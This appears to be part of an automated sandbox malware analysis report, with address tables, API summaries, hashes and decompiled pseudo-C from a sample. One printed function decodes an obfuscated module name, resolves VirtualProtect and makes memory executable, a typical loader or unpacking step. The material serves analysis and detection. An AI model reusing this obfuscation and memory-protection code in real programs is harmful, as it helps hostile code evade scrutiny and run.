                                                                                                                                                                                                        0x0041cd46
                                                                                                                                                                                                        0x0041cd4b
                                                                                                                                                                                                        0x0041cd4b
                                                                                                                                                                                                        0x0041cd27
                                                                                                                                                                                                        0x0041cd75
                                                                                                                                                                                                        0x0041cd7a
                                                                                                                                                                                                        0x0041cd82
                                                                                                                                                                                                        0x0041cd85
                                                                                                                                                                                                        0x0041cd8c
                                                                                                                                                                                                        0x0041cd90
                                                                                                                                                                                                        0x0041cdb7
                                                                                                                                                                                                        0x0041cdb7
                                                                                                                                                                                                        0x0041cdbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041cdc3
                                                                                                                                                                                                        0x0041cdc3
                                                                                                                                                                                                        0x0041cd92
                                                                                                                                                                                                        0x0041cd92
                                                                                                                                                                                                        0x0041cda4
                                                                                                                                                                                                        0x0041cda4
                                                                                                                                                                                                        0x0041cda8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041cdad
                                                                                                                                                                                                        0x0041cdb0
                                                                                                                                                                                                        0x0041cd9e
                                                                                                                                                                                                        0x0041cd9e
                                                                                                                                                                                                        0x0041cda1
                                                                                                                                                                                                        0x0041cda1
                                                                                                                                                                                                        0x0041cdb5
                                                                                                                                                                                                        0x0041cdc8
                                                                                                                                                                                                        0x0041cdec
                                                                                                                                                                                                        0x0041cdf1
                                                                                                                                                                                                        0x0041ce03
                                                                                                                                                                                                        0x0041ce03
                                                                                                                                                                                                        0x0041ce07
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041ce0e
                                                                                                                                                                                                        0x0041ce17
                                                                                                                                                                                                        0x0041cdfd
                                                                                                                                                                                                        0x0041cdfd
                                                                                                                                                                                                        0x0041ce00
                                                                                                                                                                                                        0x0041ce00
                                                                                                                                                                                                        0x0041ce3e
                                                                                                                                                                                                        0x0041ce40
                                                                                                                                                                                                        0x0041ce48
                                                                                                                                                                                                        0x0041ce4b
                                                                                                                                                                                                        0x0041ce4f
                                                                                                                                                                                                        0x0041ce76
                                                                                                                                                                                                        0x0041ce78
                                                                                                                                                                                                        0x0041ce51
                                                                                                                                                                                                        0x0041ce51
                                                                                                                                                                                                        0x0041ce55
                                                                                                                                                                                                        0x0041ce96
                                                                                                                                                                                                        0x0041ce98
                                                                                                                                                                                                        0x0041ce57
                                                                                                                                                                                                        0x0041ce57
                                                                                                                                                                                                        0x0041ce5b
                                                                                                                                                                                                        0x0041ceb6
                                                                                                                                                                                                        0x0041ceb8
                                                                                                                                                                                                        0x0041ce5d
                                                                                                                                                                                                        0x0041ced6
                                                                                                                                                                                                        0x0041ced8
                                                                                                                                                                                                        0x0041ced8
                                                                                                                                                                                                        0x0041ce5b
                                                                                                                                                                                                        0x0041ce55
                                                                                                                                                                                                        0x0041cedd
                                                                                                                                                                                                        0x0041cee4
                                                                                                                                                                                                        0x0041cef6
                                                                                                                                                                                                        0x0041cef6
                                                                                                                                                                                                        0x0041cefa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041ceff
                                                                                                                                                                                                        0x0041cf02
                                                                                                                                                                                                        0x0041cef0
                                                                                                                                                                                                        0x0041cef0
                                                                                                                                                                                                        0x0041cef3
                                                                                                                                                                                                        0x0041cef3
                                                                                                                                                                                                        0x0041cf2b
                                                                                                                                                                                                        0x0041cf30
                                                                                                                                                                                                        0x0041cf37
                                                                                                                                                                                                        0x0041cf41
                                                                                                                                                                                                        0x0041cf47
                                                                                                                                                                                                        0x0041cf4d
                                                                                                                                                                                                        0x0041cf8d
                                                                                                                                                                                                        0x0041cf94
                                                                                                                                                                                                        0x0041cf99
                                                                                                                                                                                                        0x0041cfa1
                                                                                                                                                                                                        0x0041cfad
                                                                                                                                                                                                        0x0041cfb9
                                                                                                                                                                                                        0x0041cfbd
                                                                                                                                                                                                        0x0041cfc9
                                                                                                                                                                                                        0x0041cfcc
                                                                                                                                                                                                        0x0041cfd5
                                                                                                                                                                                                        0x0041cfe3
                                                                                                                                                                                                        0x0041cfe6
                                                                                                                                                                                                        0x0041cfe9
                                                                                                                                                                                                        0x0041cff7
                                                                                                                                                                                                        0x0041cffa
                                                                                                                                                                                                        0x0041cffc
                                                                                                                                                                                                        0x0041d008
                                                                                                                                                                                                        0x0041d015
                                                                                                                                                                                                        0x0041d01c
                                                                                                                                                                                                        0x0041d021
                                                                                                                                                                                                        0x0041d029
                                                                                                                                                                                                        0x0041d035
                                                                                                                                                                                                        0x0041d041
                                                                                                                                                                                                        0x0041d045
                                                                                                                                                                                                        0x0041d051
                                                                                                                                                                                                        0x0041d054
                                                                                                                                                                                                        0x0041d05d
                                                                                                                                                                                                        0x0041d06b
                                                                                                                                                                                                        0x0041d06e
                                                                                                                                                                                                        0x0041d071
                                                                                                                                                                                                        0x0041d07f
                                                                                                                                                                                                        0x0041d082
                                                                                                                                                                                                        0x0041d084
                                                                                                                                                                                                        0x0041d090
                                                                                                                                                                                                        0x0041d09d
                                                                                                                                                                                                        0x0041d0a5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 0041CCF8
                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(000000E0), ref: 0041CD02
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,FreeConsole), ref: 0041CD1A
                                                                                                                                                                                                        • FreeConsole.KERNELBASE ref: 0041CD2F
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressConsoleCreateEventFreeHandleModuleProc
                                                                                                                                                                                                        • String ID: and b is: $-$After swapping, a is: $Console freed.$Failed to retrieve function address.$FreeConsole$L$Now x is: $The sum of numbers from 1 to 100 is: $The value of x is: $d$g$x is 1.$x is 2.$x is 3.$x is neither 1, 2, nor 3.
                                                                                                                                                                                                        • API String ID: 3483339890-386409390
                                                                                                                                                                                                        • Opcode ID: d3fc454bc8ee17c82199813fd9e8744f877acaaa542245503a28e8f46450a717
                                                                                                                                                                                                        • Instruction ID: 8e599436bb53761a45d7e8bfd19a6c9808a564786bfde09938c04333ba0431d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d3fc454bc8ee17c82199813fd9e8744f877acaaa542245503a28e8f46450a717
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BCF11774E043A8AACB04C7B9EC86BFDBEB15F96314F14025AF851A73C2C6FC4585875A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00418C60 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 186librarymemoryloaderCOMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 113 418c60-418cba 115 418cc0-418de3 113->115 116 418de8-418eb0 GetModuleHandleA GetProcAddress VirtualProtect 113->116
                                                                                                                                                                                                        C-Code - Quality: 69%
                                                                                                                                                                                                        			E00418C60(void* _a4, long _a8) {
				long _v8;
				CHAR* _v12;
				struct HINSTANCE__* _v16;
				char _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				signed int _v36;
				signed int _v37;
				void* _t222;

				_v12 = "VirtualProtect";
				_v32 = 0x80;
				_v31 = 0xa4;
				_v30 = 0xe0;
				_v29 = 0x41;
				_v28 = 3;
				_v27 = 0xc3;
				_v26 = 0x51;
				_v25 = 4;
				_v24 = 0xf0;
				_v23 = 0xd3;
				_v22 = 0x51;
				_v21 = 0xd0;
				_v20 = 0xd;
				_v36 = 0;
				while(_v36 < 0xd) {
					_v37 =  *((intOrPtr*)(_t222 + _v36 - 0x1c));
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) - 0x4d;
					_v37 = _v37 & 0x000000ff ^ 0x00000050;
					_v37 = (_v37 & 0x000000ff) - 0x4e;
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) - 0xe5;
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) - _v36;
					_v37 = _v37 & 0x000000ff ^ _v36;
					_v37 = (_v37 & 0x000000ff) - 0xc4;
					_v37 = _v37 & 0x000000ff ^ 0x0000006d;
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) >> 0x00000006 | (_v37 & 0x000000ff) << 0x00000002;
					_v37 = (_v37 & 0x000000ff) + _v36;
					_v37 =  !(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) + 0xab;
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = (_v37 & 0x000000ff) + 0x92;
					_v37 = _v37 & 0x000000ff ^ 0x000000f8;
					_v37 = (_v37 & 0x000000ff) + _v36;
					_v37 =  ~(_v37 & 0x000000ff);
					_v37 = _v37 & 0x000000ff ^ 0x000000cd;
					_v37 = (_v37 & 0x000000ff) + 0x90;
					_v37 = _v37 & 0x000000ff ^ 0x0000002b;
					_v37 = (_v37 & 0x000000ff) - 1;
					 *((char*)(_t222 + _v36 - 0x1c)) = _v37;
					_v36 = _v36 + 1;
				}
				asm("rcr edi, 0x5f");
				asm("ror eax, 0xc8");
				asm("bswap esi");
				asm("ror esi, 0x6f");
				asm("rcl edx, 0xc0");
				asm("rol ebx, 0x9f");
				asm("ror edi, 0xbe");
				asm("bswap eax");
				asm("rol ebx, 0x4b");
				asm("ror edx, 0xd0");
				asm("rol edx, 0x6e");
				asm("rol edx, 0x80");
				asm("rcr edx, 0xdf");
				asm("bswap edi");
				asm("rcl edi, 0x6f");
				asm("rcr edi, 0xf3");
				_v16 = GetModuleHandleA( &_v32);
				_v8 = 0;
				 *0x42a3a0 = GetProcAddress(_v16, _v12);
				VirtualProtect(_a4, _a8, 0x40,  &_v8); // executed
				return 0;
			}






















                                                                                                                                                                                                        0x00418c69
                                                                                                                                                                                                        0x00418c70
                                                                                                                                                                                                        0x00418c74
                                                                                                                                                                                                        0x00418c78
                                                                                                                                                                                                        0x00418c7c
                                                                                                                                                                                                        0x00418c80
                                                                                                                                                                                                        0x00418c84
                                                                                                                                                                                                        0x00418c88
                                                                                                                                                                                                        0x00418c8c
                                                                                                                                                                                                        0x00418c90
                                                                                                                                                                                                        0x00418c94
                                                                                                                                                                                                        0x00418c98
                                                                                                                                                                                                        0x00418c9c
                                                                                                                                                                                                        0x00418ca0
                                                                                                                                                                                                        0x00418ca4
                                                                                                                                                                                                        0x00418cb6
                                                                                                                                                                                                        0x00418cc7
                                                                                                                                                                                                        0x00418cd0
                                                                                                                                                                                                        0x00418cda
                                                                                                                                                                                                        0x00418ce4
                                                                                                                                                                                                        0x00418cee
                                                                                                                                                                                                        0x00418cf7
                                                                                                                                                                                                        0x00418d04
                                                                                                                                                                                                        0x00418d0d
                                                                                                                                                                                                        0x00418d17
                                                                                                                                                                                                        0x00418d21
                                                                                                                                                                                                        0x00418d2d
                                                                                                                                                                                                        0x00418d37
                                                                                                                                                                                                        0x00418d40
                                                                                                                                                                                                        0x00418d53
                                                                                                                                                                                                        0x00418d5d
                                                                                                                                                                                                        0x00418d66
                                                                                                                                                                                                        0x00418d73
                                                                                                                                                                                                        0x00418d7c
                                                                                                                                                                                                        0x00418d88
                                                                                                                                                                                                        0x00418d95
                                                                                                                                                                                                        0x00418d9f
                                                                                                                                                                                                        0x00418da8
                                                                                                                                                                                                        0x00418db5
                                                                                                                                                                                                        0x00418dc2
                                                                                                                                                                                                        0x00418dcc
                                                                                                                                                                                                        0x00418dd6
                                                                                                                                                                                                        0x00418ddf
                                                                                                                                                                                                        0x00418cb3
                                                                                                                                                                                                        0x00418cb3
                                                                                                                                                                                                        0x00418dea
                                                                                                                                                                                                        0x00418def
                                                                                                                                                                                                        0x00418df7
                                                                                                                                                                                                        0x00418e03
                                                                                                                                                                                                        0x00418e0f
                                                                                                                                                                                                        0x00418e13
                                                                                                                                                                                                        0x00418e1f
                                                                                                                                                                                                        0x00418e22
                                                                                                                                                                                                        0x00418e2b
                                                                                                                                                                                                        0x00418e39
                                                                                                                                                                                                        0x00418e3c
                                                                                                                                                                                                        0x00418e3f
                                                                                                                                                                                                        0x00418e4d
                                                                                                                                                                                                        0x00418e50
                                                                                                                                                                                                        0x00418e52
                                                                                                                                                                                                        0x00418e5e
                                                                                                                                                                                                        0x00418e75
                                                                                                                                                                                                        0x00418e78
                                                                                                                                                                                                        0x00418e8d
                                                                                                                                                                                                        0x00418ea0
                                                                                                                                                                                                        0x00418eb0

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000080), ref: 00418E6F
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(?,004216F4), ref: 00418E87
                                                                                                                                                                                                        • VirtualProtect.KERNELBASE(004216F4,?,00000040,00000000), ref: 00418EA0
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                                                                                                        • String ID: A$Q$Q
                                                                                                                                                                                                        • API String ID: 2099061454-203127502
                                                                                                                                                                                                        • Opcode ID: eab7c007813ff493d7400f2e6126ef1e6c2968ac6ad85a097b0f3b5df062cfa8
                                                                                                                                                                                                        • Instruction ID: a1869b02d53cdf2f81a375c8e2eaf3b1254d8c9906bea9798985b8b9fd0d62db
                                                                                                                                                                                                        • Opcode Fuzzy Hash: eab7c007813ff493d7400f2e6126ef1e6c2968ac6ad85a097b0f3b5df062cfa8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D2714E5580D2DD89DF06C7F988542EDBFB15F6F211F08428AE4E2B62C6C2284A4E9B75
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0040344C Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 157COMMON
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 117 40344c-403460 call 406d52 120 403462 117->120 121 40346c-403475 117->121 122 403464-403469 call 406d9c 120->122 123 403494-403499 121->123 124 403477-403480 121->124 126 4034a0-4034a3 123->126 127 40349b-40349e 123->127 124->123 125 403482-40348e 124->125 129 403490-403492 125->129 130 4034b4-4034f9 call 40326d call 40306f call 4028a7 call 40306f call 4028a7 126->130 131 4034a5-4034a7 call 402e77 126->131 127->122 129->122 146 4035a6-4035c2 130->146 135 4034ac-4034b0 131->135 135->127 137 4034b2 135->137 137->129 148 4035c8 146->148 149 4034fe-403501 146->149 150 4035e0 148->150 151 403507-40351f call 40306f call 4028a7 149->151 152 4035ca-4035cd 149->152 155 4035e3-4035ef call 4011c0 150->155 164 403521-403545 call 40306f call 4028a7 call 407564 151->164 165 40354b-403555 151->165 152->150 153 4035cf-4035de call 402e77 152->153 153->150 162 4035f6-4035f9 153->162 155->162 162->155 164->150 164->165 165->162 166 40355b-40355d 165->166 168 403571-4035a4 call 40306f call 4028a7 call 40306f call 4028a7 166->168 169 40355f-403563 166->169 168->146 169->150 171 403565-40356c call 402330 169->171 171->168
                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                        			E0040344C(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t50;
				void* _t54;
				intOrPtr _t57;
				intOrPtr* _t59;
				intOrPtr* _t63;
				void* _t76;
				void* _t77;
				intOrPtr* _t80;
				char* _t81;
				char _t84;
				intOrPtr* _t87;
				intOrPtr* _t118;
				intOrPtr* _t123;
				void* _t124;
				void* _t125;

				_push(0x54);
				E00406D52(E00417262, __ebx, __edi, __esi);
				_t84 =  *((intOrPtr*)(_t124 + 8));
				_t123 = __ecx;
				if(_t84 != 0xffffffff) {
					_t87 =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x24))));
					_t118 = 0;
					__eflags = _t87;
					if(_t87 == 0) {
						L7:
						_t50 =  *((intOrPtr*)(_t123 + 0x4c));
						__eflags = _t50 - _t118;
						if(_t50 != _t118) {
							__eflags =  *((intOrPtr*)(_t123 + 0x3c)) - _t118;
							if(__eflags != 0) {
								 *((char*)(_t124 - 0x30)) = _t84;
								E0040326D(_t84, _t124 - 0x2c, 8, _t118);
								 *((intOrPtr*)(_t124 - 4)) = _t118;
								_t54 = E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x48));
								_t57 = E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x50));
								_t118 =  *((intOrPtr*)(_t124 - 0x18)) + _t54;
								_push(_t124 - 0x38);
								_t84 = _t123 + 0x44;
								while(1) {
									_t112 = _t124 - 0x30;
									 *((intOrPtr*)(_t124 - 0x34)) = _t57;
									_t59 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t123 + 0x3c)))) + 0x14))(_t84, _t124 - 0x30, _t124 - 0x2f, _t124 - 0x3c, _t57, _t118);
									__eflags = _t59;
									if(_t59 < 0) {
										break;
									}
									__eflags = _t59 - 1;
									if(_t59 > 1) {
										__eflags = _t59 - 3;
										if(__eflags != 0) {
											goto L25;
										} else {
											_t63 = E00402E77(__eflags,  *((intOrPtr*)(_t124 - 0x30)),  *((intOrPtr*)(_t123 + 0x4c)));
											__eflags = _t63;
											if(_t63 != 0) {
												goto L27;
											} else {
												goto L25;
											}
										}
									} else {
										_t118 =  *((intOrPtr*)(_t124 - 0x38)) - E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x58));
										__eflags = _t118;
										if(_t118 == 0) {
											L16:
											 *((char*)(_t123 + 0x41)) = 1;
											__eflags =  *((intOrPtr*)(_t124 - 0x3c)) - _t124 - 0x30;
											if( *((intOrPtr*)(_t124 - 0x3c)) != _t124 - 0x30) {
												L27:
												_t123 =  *((intOrPtr*)(_t124 + 8));
											} else {
												__eflags = _t118;
												if(_t118 > 0) {
													L20:
													 *((intOrPtr*)(_t124 - 0x40)) = E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x48));
													_t57 = E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x50));
													_push(_t124 - 0x38);
													_t118 =  *((intOrPtr*)(_t124 - 0x18)) +  *((intOrPtr*)(_t124 - 0x40));
													__eflags = _t118;
													continue;
												} else {
													__eflags =  *((intOrPtr*)(_t124 - 0x18)) - 0x20;
													if( *((intOrPtr*)(_t124 - 0x18)) >= 0x20) {
														goto L25;
													} else {
														E00402330(_t84, _t124 - 0x2c, _t118, _t123, 8, 0);
														goto L20;
													}
												}
											}
										} else {
											_t76 = E004028A7(E0040306F(_t124 - 0x2c, _t124 - 0x60));
											_push( *((intOrPtr*)(_t123 + 0x4c)));
											_push(_t118);
											_push(1);
											_push(_t76);
											_t77 = E00407564(_t84, _t112, _t118, _t123, __eflags);
											_t125 = _t125 + 0x10;
											__eflags = _t118 - _t77;
											if(_t118 != _t77) {
												L25:
												__eflags = _t123;
											} else {
												goto L16;
											}
										}
									}
									E004011C0(_t124 - 0x2c, 1, 0);
									goto L2;
								}
								goto L25;
							} else {
								_t50 = E00402E77(__eflags, _t84, _t50); // executed
								__eflags = _t50;
								if(_t50 == 0) {
									goto L8;
								} else {
									goto L6;
								}
							}
						} else {
							L8:
						}
					} else {
						_t80 =  *((intOrPtr*)(__ecx + 0x34));
						__eflags = _t87 -  *_t80 + _t87;
						if(_t87 >=  *_t80 + _t87) {
							goto L7;
						} else {
							 *_t80 =  *_t80 - 1;
							__eflags =  *_t80;
							_t123 =  *((intOrPtr*)(__ecx + 0x24));
							_t81 =  *_t123;
							 *_t123 = _t81 + 1;
							 *_t81 = _t84;
							L6:
						}
					}
				} else {
				}
				L2:
				return E00406D9C(_t84, _t118, _t123);
			}


















                                                                                                                                                                                                        0x0040344c
                                                                                                                                                                                                        0x00403453
                                                                                                                                                                                                        0x00403458
                                                                                                                                                                                                        0x0040345b
                                                                                                                                                                                                        0x00403460
                                                                                                                                                                                                        0x0040346f
                                                                                                                                                                                                        0x00403471
                                                                                                                                                                                                        0x00403473
                                                                                                                                                                                                        0x00403475
                                                                                                                                                                                                        0x00403494
                                                                                                                                                                                                        0x00403494
                                                                                                                                                                                                        0x00403497
                                                                                                                                                                                                        0x00403499
                                                                                                                                                                                                        0x004034a0
                                                                                                                                                                                                        0x004034a3
                                                                                                                                                                                                        0x004034ba
                                                                                                                                                                                                        0x004034bd
                                                                                                                                                                                                        0x004034c9
                                                                                                                                                                                                        0x004034d3
                                                                                                                                                                                                        0x004034eb
                                                                                                                                                                                                        0x004034f3
                                                                                                                                                                                                        0x004034f5
                                                                                                                                                                                                        0x004034f6
                                                                                                                                                                                                        0x004035a6
                                                                                                                                                                                                        0x004035b3
                                                                                                                                                                                                        0x004035b7
                                                                                                                                                                                                        0x004035bd
                                                                                                                                                                                                        0x004035c0
                                                                                                                                                                                                        0x004035c2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004034fe
                                                                                                                                                                                                        0x00403501
                                                                                                                                                                                                        0x004035ca
                                                                                                                                                                                                        0x004035cd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004035cf
                                                                                                                                                                                                        0x004035d5
                                                                                                                                                                                                        0x004035dc
                                                                                                                                                                                                        0x004035de
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004035de
                                                                                                                                                                                                        0x00403507
                                                                                                                                                                                                        0x0040351d
                                                                                                                                                                                                        0x0040351d
                                                                                                                                                                                                        0x0040351f
                                                                                                                                                                                                        0x0040354b
                                                                                                                                                                                                        0x0040354e
                                                                                                                                                                                                        0x00403552
                                                                                                                                                                                                        0x00403555
                                                                                                                                                                                                        0x004035f6
                                                                                                                                                                                                        0x004035f6
                                                                                                                                                                                                        0x0040355b
                                                                                                                                                                                                        0x0040355b
                                                                                                                                                                                                        0x0040355d
                                                                                                                                                                                                        0x00403571
                                                                                                                                                                                                        0x00403587
                                                                                                                                                                                                        0x00403598
                                                                                                                                                                                                        0x004035a0
                                                                                                                                                                                                        0x004035a4
                                                                                                                                                                                                        0x004035a4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040355f
                                                                                                                                                                                                        0x0040355f
                                                                                                                                                                                                        0x00403563
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00403565
                                                                                                                                                                                                        0x0040356c
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040356c
                                                                                                                                                                                                        0x00403563
                                                                                                                                                                                                        0x0040355d
                                                                                                                                                                                                        0x00403521
                                                                                                                                                                                                        0x0040352f
                                                                                                                                                                                                        0x00403534
                                                                                                                                                                                                        0x00403537
                                                                                                                                                                                                        0x00403538
                                                                                                                                                                                                        0x0040353a
                                                                                                                                                                                                        0x0040353b
                                                                                                                                                                                                        0x00403540
                                                                                                                                                                                                        0x00403543
                                                                                                                                                                                                        0x00403545
                                                                                                                                                                                                        0x004035e0
                                                                                                                                                                                                        0x004035e0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00403545
                                                                                                                                                                                                        0x0040351f
                                                                                                                                                                                                        0x004035ea
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004035ef
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004034a5
                                                                                                                                                                                                        0x004034a7
                                                                                                                                                                                                        0x004034ae
                                                                                                                                                                                                        0x004034b0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004034b2
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x004034b2
                                                                                                                                                                                                        0x004034b0
                                                                                                                                                                                                        0x0040349b
                                                                                                                                                                                                        0x0040349b
                                                                                                                                                                                                        0x0040349b
                                                                                                                                                                                                        0x00403477
                                                                                                                                                                                                        0x00403477
                                                                                                                                                                                                        0x0040347e
                                                                                                                                                                                                        0x00403480
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00403482
                                                                                                                                                                                                        0x00403482
                                                                                                                                                                                                        0x00403482
                                                                                                                                                                                                        0x00403484
                                                                                                                                                                                                        0x00403487
                                                                                                                                                                                                        0x0040348c
                                                                                                                                                                                                        0x0040348e
                                                                                                                                                                                                        0x00403490
                                                                                                                                                                                                        0x00403490
                                                                                                                                                                                                        0x00403480
                                                                                                                                                                                                        0x00403462
                                                                                                                                                                                                        0x00403462
                                                                                                                                                                                                        0x00403464
                                                                                                                                                                                                        0x00403469

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Fputc$H_prolog3_
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2569218679-3916222277
                                                                                                                                                                                                        • Opcode ID: 58eb260c760e7b2d96b30122c386c9c05e1722a93f8294f44c7b8a28c931b633
                                                                                                                                                                                                        • Instruction ID: 4726f201d7542bd95522cf20840ec9224a10e0e665caa417b9dee719faa50442
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 58eb260c760e7b2d96b30122c386c9c05e1722a93f8294f44c7b8a28c931b633
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CF519532900204ABCF15EFB5CC819DEBBB9AF44705F14453FE112B72D5EA79AA44CB58
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 004067CD Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                        control_flow_graph 185 4067cd-4067d5 186 4067e4-4067ef call 40bc7f 185->186 189 4067f1-4067f2 186->189 190 4067d7-4067e2 call 40bd58 186->190 190->186 193 4067f3-4067ff 190->193 194 406801-406819 call 4067b2 call 4079c2 193->194 195 40681a-406831 call 402200 call 404efb 193->195 194->195
                                                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                                                        			E004067CD(void* __ebx, void* __edx, void* __edi, void* __eflags, intOrPtr _a4) {
				char _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				void* _t11;
				signed int _t12;
				void* _t20;
				void* _t26;
				void* _t27;

				_t27 = __edi;
				_t26 = __edx;
				_t20 = __ebx;
				while(1) {
					_t11 = E0040BC7F(_t20, _t26, _t27, _a4); // executed
					if(_t11 != 0) {
						break;
					}
					_t12 = E0040BD58(_a4);
					__eflags = _t12;
					if(_t12 == 0) {
						__eflags =  *0x42a760 & 0x00000001;
						_t28 = L"cription";
